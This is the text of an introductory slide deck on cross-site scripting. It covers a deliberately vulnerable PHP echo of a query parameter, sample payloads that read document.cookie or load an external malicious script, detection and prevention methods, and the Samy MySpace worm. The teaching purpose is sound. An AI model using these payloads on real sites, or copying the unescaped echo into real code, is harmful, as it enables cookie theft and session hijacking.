Talk about XSS

1. XSS
Avi Aryan | Saurabh Jain

2. Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications. XSS enables
attackers to inject client-side scripts into web pages viewed
by other users. A cross-site scripting vulnerability may be
used by attackers to bypass access controls such as the
same-origin policy.

4. Simple vulnerability
<?php
echo "The value you entered is: " . $_GET['val'];
?>
User: https://example.com/test.php?val=123
Hacker: https://example.com/test.php?val=<script>alert(‘Hacked’)</script>

5. <script>alert(document.cookie);</script>
Accessing Private Information
<script src=http://www.example.com/malicious-code.js></script>
%3cscript src=http://www.ex.com/malicious-code.js%3e%3c/script%3e
Using External malicious script

6. Smarter ways
<IMG SRC=j&#X41vascript:alert('test2')>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
Playing with image src
Without using javascript or script

7. Two Types of XSS
Reflected
Usually a link with evil code. One who opens the
link is affected.
Involves error on victim’s side.
Stored
Vulnerability stored in host’s database.
Easy to trap users as no extra step is required.
Example - MySpace

9. DETECTING
VULNERABILITES

10. Tech companies spend a part of their capital in detecting security vulnerabilities
before anyone else finds them.
> Static Detection
> Dynamic Detection
>> Outsourcing

11. Static Detection
Analyze codebase for issues either using a machine for known vulnerabilities or
manually.
Usually requires a dedicated team of professionals.

12. Dynamic Detection
Test application for known XSS issues by using a tool like Acunetix Web
Vulnerability Scanner.
Works by injecting payloads into the test application. If payload is saved to
database, then application is prone to XSS issues.

13. Outsourcing: Cheap way to find security holes
Companies hire freelance professionals and pay them only when a vulnerability is found.
Cheaper option than maintaining a dedicated team for the same.
Due to the high importance of security issues, these professionals are handsomely paid.

14. PREVENTING XSS ATTACKS

15. Techniques
“Don’t consume data blindly.”
> Validate Data
> Escape Data
> Sanitize Data

16. Validating Data
Validate data for certain conditions before using it.
is_type() // eg is_numeric()
regex_match()
in_array()

17. Escaping Data
Modify data to a safer format and then use it.
Example
filter_var(‘Testing <tags> & chars.’)
gives
“Testing &#60;tags&#62; &#38; chars.”

18. Sanitizing Data
Trim harmful snippets from data and then use it.
Example
filter_var(‘Testing <tags> & chars.’)
gives
“Testing & chars.”

19. MYSPACE CASE STUDY

20. In 2005, Samy, a MySpace user noticed a XSS vulnerability that allowed them to make any
user who visited their profile as friend. Now the friend was also infected with the same
worm and anyone who visited the friend’s profile also became Samy’s friend. This multifold
assault increased his friend count to millions in few hours. As a result, MySpace had to shut
down for fixing the issue which later led to loss of user trust and brand value.

21. Behind the scenes
1. Samy uses stylesheet to insert JS in his page.
2. The JS utilized a XMLHTTPRequest vulnerability to add anyone who visited
Samy’s profile as their friend.
3. The vulnerability allowed him to copy his JS to the visitor’s profile page.
4. So the exploit expanded multifold and he had millions of friends in few hours.

22. MySpace was taken down, acquired and
after few years, abandoned.
THE RESULT

23. References
https://www.wordfence.com/learn/how-to-prevent-cross-site-scripting-attacks/
https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
https://pdfs.semanticscholar.org/c598/8300da615ead559aad2e3dba8feecb85ab4f.pdf
Game: https://xss-game.appspot.com

24. Questions?